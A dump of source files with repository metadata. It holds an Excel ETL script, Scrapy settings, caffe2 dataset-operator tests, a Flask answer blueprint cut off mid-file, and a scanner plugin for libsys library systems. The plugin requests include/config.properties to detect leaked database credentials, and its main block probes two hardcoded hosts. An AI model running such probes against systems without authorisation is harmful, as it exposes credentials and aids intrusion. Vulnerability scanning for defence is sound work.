blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
780ac2b1b0a36b778e27621d5075fea40b5faadb | 8fefd2a545f69237778aff08317b61c55d8f17d4 | /risk_scoring/Data_Collection_Code/RETURN_EQUITY.py | 951e4b77e6234172c20628c2dd4e7afc57eef46f | [] | no_license | ashnarayan13/RiskScoring | 00604e6b8f33cca2e256360331938ea64870d04a | 3f1797a12bdd661c7584fd3abaa3962c1b4aeae1 | refs/heads/master | 2021-01-22T10:50:55.562517 | 2017-08-31T07:53:57 | 2017-08-31T07:53:57 | 102,341,666 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,884 | py | import xlrd
from xlwt import Workbook
# Flat ETL script: copy company identifiers and six fiscal years of
# financial figures from the master workbook into a new workbook with
# one output sheet per metric (total revenue, equity, cost of goods sold).
src = xlrd.open_workbook("/home/ashwath/PycharmProjects/risk_scoring/src/DataSet_Final.xlsx")
companies = src.sheet_by_name("CDAX")
year_sheets = [src.sheet_by_name(n)
               for n in ("FY-1", "FY-2", "FY-3", "FY-4", "FY-5", "FY-6")]
out = Workbook()
revenue = out.add_sheet("TOTAL_REVENUE")
equity = out.add_sheet("EQUITY")
cogs = out.add_sheet("COGS")
# Columns 0-1 of every output sheet: company identifiers copied from
# columns 2 and 3 of the CDAX sheet.
for row in range(2, companies.nrows):
    for metric_sheet in (revenue, equity, cogs):
        metric_sheet.write(row, 0, companies.cell_value(row, 2))
        metric_sheet.write(row, 1, companies.cell_value(row, 3))
# Columns 2-7: one value per fiscal year FY-1..FY-6, pulled from a fixed
# source column per metric (revenue=7, equity=19, COGS=12).  Output rows
# are shifted up by one relative to the FY sheets, matching the original.
for row in range(3, year_sheets[0].nrows):
    for offset, fy in enumerate(year_sheets):
        revenue.write(row - 1, 2 + offset, fy.cell_value(row, 7))
        equity.write(row - 1, 2 + offset, fy.cell_value(row, 19))
        cogs.write(row - 1, 2 + offset, fy.cell_value(row, 12))
out.save('RETURN_EQUITY.xlsx')
print("complete")
| [
"murali@fortiss.org"
] | murali@fortiss.org |
516794b1108efec8a6236ca0cb7b7bfe8e1f6a12 | f4853317939295936e224e0150e50aa2bd38879b | /project_madmuseum/project_madmuseum/settings.py | 1c406792d899465080ae6120be932829c4f2114b | [] | no_license | jessefilho/scrapyJobs | 7cd59dd00031259ffa3ea25a6b69698225cf89fc | 47cb4b781c9e8f244265a281ea933f96f368ea6f | refs/heads/master | 2020-03-29T19:43:17.382690 | 2019-01-02T20:04:23 | 2019-01-02T20:04:23 | 150,277,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,236 | py | # -*- coding: utf-8 -*-
# Scrapy settings for project_madmuseum project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
# Name of this Scrapy project/bot.
BOT_NAME = 'project_madmuseum'
# Package where the project's spider classes are looked up, and where new
# spiders generated by the scrapy CLI are placed.
SPIDER_MODULES = ['project_madmuseum.spiders']
NEWSPIDER_MODULE = 'project_madmuseum.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'project_madmuseum (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'project_madmuseum.middlewares.ProjectMadmuseumSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'project_madmuseum.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'project_madmuseum.pipelines.ProjectMadmuseumPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"jessefilho@Jesses-MacBook-Pro.local"
] | jessefilho@Jesses-MacBook-Pro.local |
f45d517a51288fdf1af81238bef427c053fc9fbe | f47863b3a595cbe7ec1c02040e7214481e4f078a | /plugins/scan/libsys/1530.py | 7d4393ead3d8ab208722872e6653f54514040048 | [] | no_license | gobiggo/0bscan | fe020b8f6f325292bda2b1fec25e3c49a431f373 | 281cf7c5c2181907e6863adde27bd3977b4a3474 | refs/heads/master | 2020-04-10T20:33:55.008835 | 2018-11-17T10:05:41 | 2018-11-17T10:05:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | #!/usr/bin/python
#-*- encoding:utf-8 -*-
# title:汇文libsys图书管理系统敏感信息泄露
#http://www.wooyun.org/bugs/wooyun-2010-0125785
def assign(service, arg):
    """Claim the target URL when the detected service is 'libsys'."""
    if service != "libsys":
        return None
    return True, arg
def audit(arg):
    """Probe a libsys deployment for an exposed include/config.properties
    file and raise a security warning when it leaks DB credentials.
    """
    payload = 'include/config.properties'
    url = arg + payload
    code, head, res, errcode, _ = curl.curl2(url)
    # Bug fix: the original condition `code == 200 and 'host' and 'port'
    # and 'user' and 'password' in res` only evaluated `'password' in res`
    # ('host'/'port'/'user' are truthy string literals).  Every keyword
    # must actually appear in the response body.
    if code == 200 and all(key in res for key in ('host', 'port', 'user', 'password')):
        security_warning(url)
if __name__ == '__main__':
    # Ad-hoc smoke run against two known libsys deployments; assign()
    # returns (True, url) for the 'libsys' service, and [1] extracts the url.
    audit(assign('libsys', 'http://www.njjnlib.cn:8080/')[1])
    audit(assign('libsys', 'http://202.201.163.2:8080/')[1])
| [
"zer0i3@aliyun.com"
] | zer0i3@aliyun.com |
21ea5cf5e0b3b2984691a47e3c896c1d987cf016 | 63c5306b91db445016059a7f0c7ac167bf231d3c | /caffe2/python/operator_test/dataset_ops_test.py | ab6645e250bc558346fef1dfa56e2c3a3abfa0ce | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | Fletcher3003/caffe2 | b57ad712993b7c50d16b8f0eedc2e5587bc89e0e | 731096902a090b49612b02cc5a1301c81bf93943 | refs/heads/master | 2020-04-15T18:10:11.514190 | 2019-01-09T17:10:14 | 2019-01-09T17:10:14 | 164,903,847 | 0 | 0 | Apache-2.0 | 2019-01-09T17:02:59 | 2019-01-09T17:02:53 | Shell | UTF-8 | Python | false | false | 21,910 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from caffe2.python import core, workspace, dataset
from caffe2.python.dataset import Const
from caffe2.python.schema import (
List, Field, Struct, Scalar, Map, from_blob_list, FetchRecord, NewRecord,
FeedRecord
)
from caffe2.python.test_util import TestCase
import numpy.testing as npt
import string
from hypothesis import given
import hypothesis.strategies as st
def _assert_arrays_equal(actual, ref, err_msg):
if ref.dtype.kind in ('S', 'O', 'U'):
np.testing.assert_array_equal(actual, ref, err_msg=err_msg)
else:
np.testing.assert_allclose(
actual, ref, atol=1e-4,
rtol=1e-4, err_msg=err_msg
)
def _assert_records_equal(actual, ref):
    """Assert that two schema records carry the same number of field blobs
    and that every corresponding blob pair compares equal."""
    assert isinstance(actual, Field)
    assert isinstance(ref, Field)
    actual_blobs = actual.field_blobs()
    ref_blobs = ref.field_blobs()
    assert len(actual_blobs) == len(ref_blobs), (
        'Records have different lengths: %d vs. %d' % (
            len(actual_blobs), len(ref_blobs)))
    for name, actual_blob, ref_blob in zip(
            ref.field_names(), actual_blobs, ref_blobs):
        _assert_arrays_equal(
            actual_blob, ref_blob, err_msg='Mismatch in field %s.' % name)
@st.composite
def _sparse_features_map(draw, num_records, **kwargs):
    """Hypothesis strategy: draw the flattened blobs of a sparse
    (id -> list-of-ids) feature map covering `num_records` records.

    Returns [map lengths, keys, per-key value-list lengths, values] in the
    flattened layout expected by `from_blob_list`.
    """
    # One map length per record.
    sparse_maps_lengths = draw(
        st.lists(
            st.integers(min_value=1, max_value=10),
            min_size=num_records,
            max_size=num_records
        )
    )
    sparse_maps_total_length = sum(sparse_maps_lengths)
    # One unique key per map entry across all records.
    sparse_keys = draw(
        st.lists(
            st.integers(min_value=1, max_value=100),
            min_size=sparse_maps_total_length,
            max_size=sparse_maps_total_length,
            unique=True
        )
    )
    # One value-list length per key.
    sparse_values_lengths = draw(
        st.lists(
            st.integers(min_value=1, max_value=10),
            min_size=sparse_maps_total_length,
            max_size=sparse_maps_total_length
        )
    )
    total_sparse_values_lengths = sum(sparse_values_lengths)
    sparse_values = draw(
        # max_value is max int64
        st.lists(
            st.integers(min_value=1, max_value=9223372036854775807),
            min_size=total_sparse_values_lengths,
            max_size=total_sparse_values_lengths
        )
    )
    return [
        sparse_maps_lengths,
        sparse_keys,
        sparse_values_lengths,
        sparse_values,
    ]
@st.composite
def _dense_features_map(draw, num_records, **kwargs):
    """Hypothesis strategy: draw the flattened blobs of a dense
    (id -> float) feature map covering `num_records` records.

    Returns [map lengths, keys, values] in the flattened layout expected
    by `from_blob_list`.
    """
    # One map length per record.
    float_lengths = draw(
        st.lists(
            st.integers(min_value=1, max_value=10),
            min_size=num_records,
            max_size=num_records
        )
    )
    total_length = sum(float_lengths)
    # One unique key per map entry across all records.
    float_keys = draw(
        st.lists(
            st.integers(min_value=1, max_value=100),
            min_size=total_length,
            max_size=total_length,
            unique=True
        )
    )
    float_values = draw(
        st.lists(st.floats(),
                 min_size=total_length,
                 max_size=total_length)
    )
    return [float_lengths, float_keys, float_values]
@st.composite
def _dataset(draw, min_elements=3, max_elements=10, **kwargs):
    """Hypothesis strategy: draw a (schema, contents record, num_records)
    triple with a dense map, a sparse map, and a text column.
    """
    schema = Struct(
        # Dense Features Map
        ('floats', Map(
            Scalar(np.int32), Scalar(np.float32)
        )),
        # Sparse Features Map
        ('int_lists', Map(
            Scalar(np.int32),
            List(Scalar(np.int64)),
        )),
        # Complex Type
        ('text', Scalar(str)),
    )
    num_records = draw(
        st.integers(min_value=min_elements,
                    max_value=max_elements)
    )
    raw_dense_features_map_contents = draw(_dense_features_map(num_records))
    raw_sparse_features_map_contents = draw(_sparse_features_map(num_records))
    # One lowercase-ascii string per record.
    raw_text_contents = [
        draw(
            st.lists(
                st.text(alphabet=string.ascii_lowercase),
                min_size=num_records,
                max_size=num_records
            )
        )
    ]
    # Concatenate all raw contents to a single one
    contents_raw = raw_dense_features_map_contents + raw_sparse_features_map_contents + raw_text_contents
    contents = from_blob_list(schema, contents_raw)
    return (schema, contents, num_records)
class TestDatasetOps(TestCase):
    @given(_dataset())
    def test_pack_unpack(self, input):
        """
        Tests if packing and unpacking of the whole dataset is an identity.
        """
        (schema, contents, num_records) = input
        dataset_fields = schema.field_names()
        # Feed the generated record into the workspace and round-trip it
        # through PackRecords -> UnPackRecords.
        net = core.Net('pack_unpack_net')
        batch = NewRecord(net, contents)
        FeedRecord(batch, contents)
        packed = net.PackRecords(
            batch.field_blobs(), 1,
            fields=dataset_fields
        )
        unpacked = packed.UnPackRecords(
            [], len(dataset_fields),
            fields=dataset_fields
        )
        workspace.RunNetOnce(net)
        # Every unpacked blob must match the original field blob exactly.
        for initial_tensor, unpacked_tensor in zip(
            batch.field_blobs(), unpacked
        ):
            npt.assert_array_equal(
                workspace.FetchBlob(initial_tensor),
                workspace.FetchBlob(unpacked_tensor)
            )
    def test_dataset_ops(self):
        """
        End-to-end walkthrough of the dataset API: schema definition,
        writing, sequential / random / sorted-and-shuffled reading, and
        schema slicing.

        1. Defining the schema of our dataset.
        This example schema could represent, for example, a search query log.
        """
        schema = Struct(
            # fixed size vector, which will be stored as a matrix when batched
            ('dense', Scalar((np.float32, 3))),
            # could represent a feature map from feature ID to float value
            ('floats', Map(
                Scalar(np.int32), Scalar(np.float32)
            )),
            # could represent a multi-valued categorical feature map
            ('int_lists', Map(
                Scalar(np.int32),
                List(Scalar(np.int64)),
            )),
            # could represent a multi-valued, weighted categorical feature map
            (
                'id_score_pairs', Map(
                    Scalar(np.int32),
                    Map(
                        Scalar(np.int64),
                        Scalar(np.float32),
                        keys_name='ids',
                        values_name='scores'
                    ),
                )
            ),
            # additional scalar information
            (
                'metadata', Struct(
                    ('user_id', Scalar(np.int64)),
                    ('user_embed', Scalar((np.float32, 2))),
                    ('query', Scalar(str)),
                )
            ),
        )
        """
        This is what the flattened fields for this schema look like, along
        with its type. Each one of these fields will be stored, read and
        writen as a tensor.
        """
        expected_fields = [
            ('dense', (np.float32, 3)),
            ('floats:lengths', np.int32),
            ('floats:values:keys', np.int32),
            ('floats:values:values', np.float32),
            ('int_lists:lengths', np.int32),
            ('int_lists:values:keys', np.int32),
            ('int_lists:values:values:lengths', np.int32),
            ('int_lists:values:values:values', np.int64),
            ('id_score_pairs:lengths', np.int32),
            ('id_score_pairs:values:keys', np.int32),
            ('id_score_pairs:values:values:lengths', np.int32),
            ('id_score_pairs:values:values:values:ids', np.int64),
            ('id_score_pairs:values:values:values:scores', np.float32),
            ('metadata:user_id', np.int64),
            ('metadata:user_embed', (np.float32, 2)),
            ('metadata:query', str),
        ]
        # The flattened schema must agree with the table above, name by name
        # and dtype by dtype.
        zipped = zip(
            expected_fields, schema.field_names(), schema.field_types()
        )
        for (ref_name, ref_type), name, dtype in zipped:
            self.assertEquals(ref_name, name)
            self.assertEquals(np.dtype(ref_type), dtype)
        """
        2. The contents of our dataset.
        Contents as defined below could represent, for example, a log of
        search queries along with dense, sparse features and metadata.
        The datset below has 3 top-level entries.
        """
        contents_raw = [
            # dense
            [[1.1, 1.2, 1.3], [2.1, 2.2, 2.3], [3.1, 3.2, 3.3]],
            # floats
            [1, 2, 3],  # len
            [11, 21, 22, 31, 32, 33],  # key
            [1.1, 2.1, 2.2, 3.1, 3.2, 3.3],  # value
            # int lists
            [2, 0, 1],  # len
            [11, 12, 31],  # key
            [2, 4, 3],  # value:len
            [111, 112, 121, 122, 123, 124, 311, 312, 313],  # value:value
            # id score pairs
            [1, 2, 2],  # len
            [11, 21, 22, 31, 32],  # key
            [1, 1, 2, 2, 3],  # value:len
            [111, 211, 221, 222, 311, 312, 321, 322, 323],  # value:ids
            [11.1, 21.1, 22.1, 22.2, 31.1, 31.2, 32.1, 32.2, 32.3],  # val:score
            # metadata
            [123, 234, 456],  # user_id
            [[0.2, 0.8], [0.5, 0.5], [0.7, 0.3]],  # user_embed
            ['dog posts', 'friends who like to', 'posts about ca'],  # query
        ]
        # convert the above content to ndarrays, checking against the schema
        contents = from_blob_list(schema, contents_raw)
        """
        3. Creating and appending to the dataset.
        We first create an empty dataset with the given schema.
        Then, a Writer is used to append these entries to the dataset.
        """
        ds = dataset.Dataset(schema)
        net = core.Net('init')
        with core.NameScope('init'):
            ds.init_empty(net)
            content_blobs = NewRecord(net, contents)
            FeedRecord(content_blobs, contents)
            writer = ds.writer(init_net=net)
            writer.write_record(net, content_blobs)
        workspace.RunNetOnce(net)
        """
        4. Iterating through the dataset contents.
        If we were to iterate through the top level entries of our dataset,
        this is what we should expect to see:
        """
        entries_raw = [
            (
                [[1.1, 1.2, 1.3]],  # dense
                [1],
                [11],
                [1.1],  # floats
                [2],
                [11, 12],
                [2, 4],
                [111, 112, 121, 122, 123, 124],  # intlst
                [1],
                [11],
                [1],
                [111],
                [11.1],  # id score pairs
                [123],
                [[0.2, 0.8]],
                ['dog posts'],  # metadata
            ),
            (
                [[2.1, 2.2, 2.3]],  # dense
                [2],
                [21, 22],
                [2.1, 2.2],  # floats
                [0],
                [],
                [],
                [],  # int list
                [2],
                [21, 22],
                [1, 2],
                [211, 221, 222],
                [21.1, 22.1, 22.2],
                [234],
                [[0.5, 0.5]],
                ['friends who like to'],  # metadata
            ),
            (
                [[3.1, 3.2, 3.3]],  # dense
                [3],
                [31, 32, 33],
                [3.1, 3.2, 3.3],  # floats
                [1],
                [31],
                [3],
                [311, 312, 313],  # int lst
                [2],
                [31, 32],
                [2, 3],
                [311, 312, 321, 322, 323],
                [31.1, 31.2, 32.1, 32.2, 32.3],  # id score list
                [456],
                [[0.7, 0.3]],
                ['posts about ca'],  # metadata
            ),
            # after the end of the dataset, we will keep getting empty vectors
            ([], ) * 16,
            ([], ) * 16,
        ]
        entries = [from_blob_list(schema, e) for e in entries_raw]
        """
        Let's go ahead and create the reading nets.
        We will run `read` net multiple times and assert that we are reading the
        entries the way we stated above.
        """
        read_init_net = core.Net('read_init')
        read_next_net = core.Net('read_next')
        reader = ds.reader(read_init_net)
        should_continue, batch = reader.read_record(read_next_net)
        workspace.RunNetOnce(read_init_net)
        workspace.CreateNet(read_next_net, True)
        # Each run of read_next_net must yield the next expected entry.
        for entry in entries:
            workspace.RunNet(str(read_next_net))
            actual = FetchRecord(batch)
            _assert_records_equal(actual, entry)
        """
        5. Reading/writing in a single plan
        If all of operations on the data are expressible as Caffe2 operators,
        we don't need to load the data to python, iterating through the dataset
        in a single Plan.
        Where we will process the dataset a little and store it in a second
        dataset. We can reuse the same Reader since it supports reset.
        """
        reset_net = core.Net('reset_net')
        reader.reset(reset_net)
        read_step, batch = reader.execution_step()
        """ We will add the line number * 1000 to the feature ids. """
        process_net = core.Net('process')
        line_no = Const(process_net, 0, dtype=np.int32)
        const_one = Const(process_net, 1000, dtype=np.int32)
        process_net.Add([line_no, const_one], [line_no])
        field = batch.floats.keys.get()
        process_net.Print(field, [])
        process_net.Add([field, line_no], field, broadcast=1, axis=0)
        """ Lets create a second dataset and append to it. """
        ds2 = dataset.Dataset(schema, name='dataset2')
        ds2.init_empty(reset_net)
        writer = ds2.writer(reset_net)
        writer.write_record(process_net, batch)
        # commit is not necessary for DatasetWriter but will add it for
        # generality of the example
        commit_net = core.Net('commit')
        writer.commit(commit_net)
        """ Time to create and run a plan which will do the processing """
        plan = core.Plan('process')
        plan.AddStep(core.execution_step('reset', reset_net))
        plan.AddStep(read_step.AddNet(process_net))
        plan.AddStep(core.execution_step('commit', commit_net))
        workspace.RunPlan(plan)
        """
        Now we should have dataset2 populated.
        """
        ds2_data = FetchRecord(ds2.content())
        # Undo the per-line +1000 shift applied by process_net before
        # comparing against the original contents.
        field = ds2_data.floats.keys
        field.set(blob=field.get() - [1000, 2000, 2000, 3000, 3000, 3000])
        _assert_records_equal(contents, ds2_data)
        """
        6. Slicing a dataset
        You can create a new schema from pieces of another schema and reuse
        the same data.
        """
        subschema = Struct(('top_level', schema.int_lists.values))
        int_list_contents = contents.int_lists.values.field_names()
        self.assertEquals(len(subschema.field_names()), len(int_list_contents))
        """
        7. Random Access a dataset
        """
        read_init_net = core.Net('read_init')
        read_next_net = core.Net('read_next')
        idx = np.array([2, 1, 0])
        indices_blob = Const(read_init_net, idx, name='indices')
        reader = ds.random_reader(read_init_net, indices_blob)
        reader.computeoffset(read_init_net)
        should_stop, batch = reader.read_record(read_next_net)
        workspace.CreateNet(read_init_net, True)
        workspace.RunNetOnce(read_init_net)
        workspace.CreateNet(read_next_net, True)
        # Entries must come back in the order given by `idx`.
        for i in range(len(entries)):
            k = idx[i] if i in idx else i
            entry = entries[k]
            workspace.RunNet(str(read_next_net))
            actual = FetchRecord(batch)
            _assert_records_equal(actual, entry)
        # One more read past the end must flip the should_stop blob.
        workspace.RunNet(str(read_next_net))
        self.assertEquals(True, workspace.FetchBlob(should_stop))
        """
        8. Random Access a dataset with loop_over = true
        """
        read_init_net = core.Net('read_init')
        read_next_net = core.Net('read_next')
        idx = np.array([2, 1, 0])
        indices_blob = Const(read_init_net, idx, name='indices')
        reader = ds.random_reader(read_init_net, indices_blob, loop_over=True)
        reader.computeoffset(read_init_net)
        should_stop, batch = reader.read_record(read_next_net)
        workspace.CreateNet(read_init_net, True)
        workspace.RunNetOnce(read_init_net)
        workspace.CreateNet(read_next_net, True)
        # With loop_over=True the reader wraps around, so should_stop stays
        # False even after several passes over the data.
        for _ in range(len(entries) * 3):
            workspace.RunNet(str(read_next_net))
            self.assertEquals(False, workspace.FetchBlob(should_stop))
        """
        9. Sort and shuffle a dataset
        This sort the dataset using the score of a certain column,
        and then shuffle within each chunk of size batch_size * shuffle_size
        before shuffling the chunks.
        """
        read_init_net = core.Net('read_init')
        read_next_net = core.Net('read_next')
        reader = ds.random_reader(read_init_net)
        reader.sort_and_shuffle(read_init_net, 'int_lists:lengths', 1, 2)
        reader.computeoffset(read_init_net)
        should_continue, batch = reader.read_record(read_next_net)
        workspace.CreateNet(read_init_net, True)
        workspace.RunNetOnce(read_init_net)
        workspace.CreateNet(read_next_net, True)
        # With this data the sort-and-shuffle pass is expected to emit the
        # entries in reverse order.
        expected_idx = np.array([2, 1, 0])
        for i in range(len(entries)):
            k = expected_idx[i] if i in expected_idx else i
            entry = entries[k]
            workspace.RunNet(str(read_next_net))
            actual = FetchRecord(batch)
            _assert_records_equal(actual, entry)
    def test_last_n_window_ops(self):
        """LastNWindowCollector keeps (up to) the last N rows appended to it;
        run it 1, 2 and 3 times over a 3-row input and check the rotation."""
        collect_net = core.Net('collect_net')
        collect_net.GivenTensorFill(
            [],
            'input',
            shape=[3, 2],
            values=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
        )
        input_array =\
            np.array(list(range(1, 7)), dtype=np.float32).reshape(3, 2)
        workspace.CreateBlob('output')
        workspace.FeedBlob('next', np.array(0, dtype=np.int32))
        collect_net.LastNWindowCollector(
            ['output', 'next', 'input'],
            ['output', 'next'],
            num_to_collect=7,
        )
        # One pass appends 3 rows; the output equals the input.
        plan = core.Plan('collect_data')
        plan.AddStep(
            core.execution_step('collect_data', [collect_net],
                                num_iter=1)
        )
        workspace.RunPlan(plan)
        reference_result = workspace.FetchBlob('output')
        npt.assert_array_equal(input_array, reference_result)
        # Two more passes: 9 rows seen in total, window holds the last 7,
        # stored in the collector's circular order.
        plan = core.Plan('collect_data')
        plan.AddStep(
            core.execution_step('collect_data', [collect_net],
                                num_iter=2)
        )
        workspace.RunPlan(plan)
        reference_result = workspace.FetchBlob('output')
        npt.assert_array_equal(input_array[[1, 2, 2, 0, 1, 2, 0]],
                               reference_result)
        # Three more passes: circular buffer advances again.
        plan = core.Plan('collect_data')
        plan.AddStep(
            core.execution_step('collect_data', [collect_net],
                                num_iter=3)
        )
        workspace.RunPlan(plan)
        reference_result = workspace.FetchBlob('output')
        npt.assert_array_equal(input_array[[2, 0, 1, 2, 2, 0, 1]],
                               reference_result)
    def test_collect_tensor_ops(self):
        """CollectTensor reservoir-samples rows from a stream; check the
        collected count, shape, and that sampling covers the stream roughly
        uniformly and consistently across parallel blobs."""
        init_net = core.Net('init_net')
        blobs = ['blob_1', 'blob_2', 'blob_3']
        bvec_map = {}
        ONE = init_net.ConstantFill([], 'ONE', shape=[1, 2], value=1)
        for b in blobs:
            init_net.ConstantFill([], [b], shape=[1, 2], value=0)
            bvec_map[b] = b + '_vec'
            init_net.CreateTensorVector([], [bvec_map[b]])
        # Each iteration increments every blob by ONE, simulating a stream
        # of distinct examples.
        reader_net = core.Net('reader_net')
        for b in blobs:
            reader_net.Add([b, ONE], [b])
        collect_net = core.Net('collect_net')
        num_to_collect = 1000
        max_example_to_cover = 100000
        bvec = [bvec_map[b] for b in blobs]
        collect_net.CollectTensor(
            bvec + blobs,
            bvec,
            num_to_collect=num_to_collect,
        )
        print('Collect Net Proto: {}'.format(collect_net.Proto()))
        plan = core.Plan('collect_data')
        plan.AddStep(core.execution_step('collect_init', init_net))
        plan.AddStep(
            core.execution_step(
                'collect_data', [reader_net, collect_net],
                num_iter=max_example_to_cover
            )
        )
        workspace.RunPlan(plan)
        # concat the collected tensors
        concat_net = core.Net('concat_net')
        bconcated_map = {}
        bsize_map = {}
        for b in blobs:
            bconcated_map[b] = b + '_concated'
            bsize_map[b] = b + '_size'
            concat_net.ConcatTensorVector([bvec_map[b]], [bconcated_map[b]])
            concat_net.TensorVectorSize([bvec_map[b]], [bsize_map[b]])
        workspace.RunNetOnce(concat_net)
        # check data
        reference_result = workspace.FetchBlob(bconcated_map[blobs[0]])
        self.assertEqual(
            reference_result.shape,
            (min(num_to_collect, max_example_to_cover), 2)
        )
        size = workspace.FetchBlob(bsize_map[blobs[0]])
        self.assertEqual(tuple(), size.shape)
        self.assertEqual(min(num_to_collect, max_example_to_cover), size.item())
        # Sampled values should spread over the whole stream: every decile
        # of the range must hold at least 60% of its expected share.
        hist, _ = np.histogram(
            reference_result[:, 0],
            bins=10,
            range=(1, max_example_to_cover)
        )
        print('Sample histogram: {}'.format(hist))
        self.assertTrue(all(hist > 0.6 * (num_to_collect / 10)))
        # All three blobs advance in lockstep, so the same rows must have
        # been sampled from each.
        for i in range(1, len(blobs)):
            result = workspace.FetchBlob(bconcated_map[blobs[i]])
            self.assertEqual(reference_result.tolist(), result.tolist())
if __name__ == "__main__":
    # Allow running this test module directly with the stdlib runner.
    import unittest
    unittest.main()
| [
"charliehouseago@gmail.com"
] | charliehouseago@gmail.com |
8b7502a2975dab74af3056b8712ffcf0fb3e4eb8 | 667bf1d4802030d16d62dc27fcbd0196944e63b3 | /app/answer.py | 628d7fe1dec6d853173cded4341794f1f6f36fcb | [
"MIT"
] | permissive | kaiwk/forum-wechat | f8e78b03786e8fd27ef1774c5cacf83d2816bcfd | bdd5439b7d243c1678de522a63f36469423044ce | refs/heads/master | 2022-12-24T08:54:25.539142 | 2018-12-19T15:20:26 | 2018-12-19T15:20:26 | 159,819,534 | 0 | 0 | MIT | 2022-12-08T01:28:25 | 2018-11-30T12:19:18 | Python | UTF-8 | Python | false | false | 1,850 | py | from flask import Blueprint, jsonify, request
from sqlalchemy.orm.exc import NoResultFound
from app.database import Answer
from . import get_logger
log = get_logger()
# Blueprint grouping the answer-related routes defined below.
bp = Blueprint('answer', __name__)
@bp.route('/<int:answer_id>', methods=['GET'])
def get_answer(answer_id):
    """Return a single answer as a JSON payload.

    Responds with the 404 payload when no answer with ``answer_id`` exists.
    """
    # Bug fix: Query.get() returns None for a missing primary key -- it does
    # not raise NoResultFound -- so the old try/except branch was dead and a
    # missing row crashed below with AttributeError. Check the result instead.
    answer = Answer.query.get(answer_id)
    if answer is None:
        log.error('no answer found with id %s', answer_id)
        return jsonify({
            'status': 404,
            'code': 1,
            'msg': 'no answer found'
        })
    return jsonify({
        'status': 200,
        'code': 0,
        'msg': 'get success',
        'answer': {
            'id': answer.id,
            'user_id': answer.user_id,
            'question_id': answer.question_id,
            'content': answer.content,
            'anonymous': answer.anonymous
        }
    })
@bp.route('/<int:answer_id>/comments', methods=['GET'])
def get_comments(answer_id):
    """Return all comments attached to an answer as a JSON list."""
    # Bug fix: Query.get() returns None when the row is missing (it never
    # raises NoResultFound), so test the result instead of catching the
    # exception -- otherwise `answer.comments` crashed with AttributeError.
    answer = Answer.query.get(answer_id)
    if answer is None:
        log.error('no answer found with id %s', answer_id)
        return jsonify({
            'status': 404,
            'code': 1,
            'msg': 'no answer found'
        })
    return jsonify({
        'status': 200,
        'code': 0,
        'msg': "get success",
        'data': [a.as_dict() for a in answer.comments.all()]
    })
@bp.route('/', methods=['POST'])
def create_answer():
    """Create an answer from a JSON body with keys user_id, question_id,
